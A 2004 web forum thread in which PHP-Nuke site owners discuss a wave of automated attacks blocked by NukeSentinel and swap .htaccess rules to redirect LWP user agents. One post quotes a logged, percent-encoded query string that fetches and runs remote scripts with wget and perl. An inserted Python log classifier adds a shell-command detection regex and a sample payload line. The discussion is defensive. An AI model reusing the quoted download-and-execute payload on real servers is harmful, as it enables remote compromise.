Author |
Message |
flatliner
New Member


Joined: Dec 25, 2004
Posts: 2
|
Posted:
Sat Dec 25, 2004 8:41 am |
|
Man, what a Xmas. Got home from spending time at the in-laws (OMG), and as if that's not bad enough, I see 30 emails from my website, all blocked attempts. Thanks for everything, your protection saved me.
|
|
|
|
 |
64bitguy
The Mouse Is Extension Of Arm

Joined: Mar 06, 2004
Posts: 1164
|
Posted:
Sat Dec 25, 2004 10:28 am |
|
Since about 1:21AM this morning, my site has been hit by 109 different abuse attempts, an all-time high. In fact, in the past 11 hours I've been protected by NukeSentinel more times than the combined history.
They are all various types of lwp::simple attacks.
They range from highlight abuse attempts to XSS abuse attempts, to well.. you name it.
If I didn't know better, I'd swear this was either the activity of a trojan or worm on people's systems.
Anyway, I feel bad for anyone that hasn't upgraded to 2.0.11 because 99% of these attacks are going after my Forums, unlike the above post.
For example:
Quote: | Query String: (Edited to mess with the script kiddies) 64bit.us/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlite=%2527.%70%61%73%73%74%68%andonandonandon |
Anyway... I've got a TON of these and others if anyone wants them. Let's hope the hack attempts slow down soon! |
_________________ Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance. |
|
|
 |
flatliner

|
Posted:
Sat Dec 25, 2004 10:49 am |
|
Since my last post I have received another 30 or so attacks. I didn't think I was that popular LOL. What do you have for your blocker strings? Are you default or did you add more?
My harvester list is default, and for my Request Method I added:
Delete
Delete & Trace
HEAD
Trace
String Blocker has no List |
|
|
|
 |
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 17088
|
Posted:
Sat Dec 25, 2004 10:51 am |
|
|
|
 |
64bitguy

|
Posted:
Sat Dec 25, 2004 11:14 am |
|
Thanks Raven, I guess I missed those posts about everyone else getting attacked, but given the scale of the attacks and the VAST number of IP's involved, I'm forced to wonder if this is a worm, virus or what?
At present, I haven't changed my .htaccess because frankly, I've modified my forwarding properties in NukeSentinel so it sends them to a Google adsense ad... I figure what the heck, if I'm going to get attacked, they might as well pay me for it
If I can figure out the right rewrite condition/rule for htaccess to forward them to an adsense ad (instead of to the php file) I'll mod it accordingly.
Thanks for the info! |
|
|
|
 |
Muffin
Client

Joined: Apr 10, 2004
Posts: 649
Location: UK
|
Posted:
Sat Dec 25, 2004 4:48 pm |
|
Which htaccess file do we have to put this code in, and where?
Quote: | RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple
RewriteRule ^.*$ emailsforyou.php [L]
RewriteEngine Off |
In my nuke/html folder htaccess I just have a list of banned IPs, and in the abuse folder htaccess it just says allow from all.
Thanks |
_________________ Classic Mini rules the bends & bends the rules!
|
|
|
 |
Raven

|
Posted:
Sat Dec 25, 2004 6:02 pm |
|
It goes in your main .htaccess folder. |
|
|
|
 |
Muffin

|
Posted:
Sat Dec 25, 2004 7:00 pm |
|
Thanks Raven
Do I put it in the top of the htaccess file?
All I have in mine at the moment is a list of the IPs that Sentinel has banned and nothing else. That's in the nuke/html/abuse folder.
Or do you mean the main htaccess in my hosting root directory?
Don't ya just love us brainy ones lol |
|
|
|
 |
Raven

|
Posted:
Sat Dec 25, 2004 9:06 pm |
|
Main .htaccess, where config.php is stored. I would put it at the top. |
|
|
|
 |
djdiz-e
Regular


Joined: Dec 19, 2004
Posts: 51
Location: Ontario, Canada
|
Posted:
Sat Dec 25, 2004 10:29 pm |
|
I added this to my .htaccess. Is this right?
Quote: | RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
RewriteRule ^.*$ emailsforyou.php [L]
RewriteEngine Off |
|
|
|
|
 |
Raven

|
Posted:
Sat Dec 25, 2004 10:35 pm |
|
Instead of
Code:
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
Use
Code:
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
|
|
|
|
|
 |
djdiz-e

|
Posted:
Sat Dec 25, 2004 10:43 pm |
|
Ah, good idea, thanks.
And another question: emailsforyou.php,
is that a page that displays to the attacker? |
|
|
|
 |
Raven

|
Posted:
Sat Dec 25, 2004 10:48 pm |
|
No. But it can be whatever you want. |
|
|
|
 |
djdiz-e

|
Posted:
Sat Dec 25, 2004 11:12 pm |
|
I added this to the top of my .htaccess and I still get emails from Sentinel saying it blocked... Is this normal?
My .htaccess file:
Quote: | RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteRule ^.*$ emailsforyou.php [L]
RewriteEngine Off |
E-mail:
|
|
|
|
 |
Muffin

|
Posted:
Sun Dec 26, 2004 5:41 am |
|
Thanks Raven {{{hugs}}}
djdiz-e you need to add this line as well I think
Quote: | RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple |
|
|
|
|
 |
Raven

|
Posted:
Sun Dec 26, 2004 8:03 am |
|
Muffin wrote: | Thanks Raven {{{hugs}}}
djdiz-e you need to add this line as well I think
Quote: | RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple | |
No, you don't need that line. The ^LWP [NC] means any user-agent beginning with LWP, regardless of case. |
|
|
|
 |
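The `^LWP [NC]` condition discussed above, applied to access-log lines together with a decode of the query string, as an added example that is not code from the thread or from NukeSentinel. It assumes Apache combined log format; the sample lines, the indicator list and the names `classify` and `full_decode` are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Same test as `RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]`: prefix match, any case.
UA_RULE = re.compile(r"^LWP", re.IGNORECASE)
# Assumed indicator list for this example: a shell separator followed by a command.
SHELL_HINT = re.compile(r"[;|`]\s*(?:wget|curl|perl|rm|sh)\b", re.IGNORECASE)
# Apache combined log format: ip, request line, status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$'
)

# Constructed sample lines (documentation IPs, placeholder host), not from the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Dec/2004:01:21:07 -0500] "GET /modules.php?name=Forums&rush=cd%20/tmp%3Bwget%20example.invalid/x&highlite=%2527 HTTP/1.0" 200 512 "-" "LWP::Simple/5.803"',
    '198.51.100.4 - - [25/Dec/2004:01:22:10 -0500] "GET /modules.php?name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0 (Windows; U)"',
    '192.0.2.9 - - [25/Dec/2004:01:23:44 -0500] "GET /modules.php?name=Forums&highlite=%2527 HTTP/1.0" 200 512 "-" "lwp-trivial/1.41"',
    '203.0.113.8 - - [25/Dec/2004:01:25:02 -0500] "GET /modules.php?name=Forums&rush=cd%20/tmp%3Bwget%20example.invalid/x&highlite=%2527 HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
]

def full_decode(value, max_rounds=5):
    """Percent-decode until stable; returns (text, rounds), so %2527 -> %27 -> ' is 2."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def classify(line):
    """Return (ip, reasons) for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ip, target, agent = m.groups()
    decoded, rounds = full_decode(target.partition("?")[2])
    reasons = []
    if UA_RULE.search(agent):          # what the .htaccess rule catches
        reasons.append("ua-lwp")
    if rounds > 1:                     # encoding layered to slip past a single decode
        reasons.append("double-encoded")
    if SHELL_HINT.search(decoded):     # command text visible only after decoding
        reasons.append("shell-command")
    return ip, reasons

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry))
```

The last sample line carries the same query string under a browser-style User-Agent, so it is flagged by the query-string checks only; the User-Agent header is client-supplied, which is why the rewrite rule complements request filtering rather than replacing it.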
twinjet
New Member


Joined: Jan 17, 2005
Posts: 22
|
Posted:
Fri Jan 28, 2005 1:37 am |
|
i was just simple and wanted to let the poster of this the it is makarena not makerel |
|
|
|
 |
|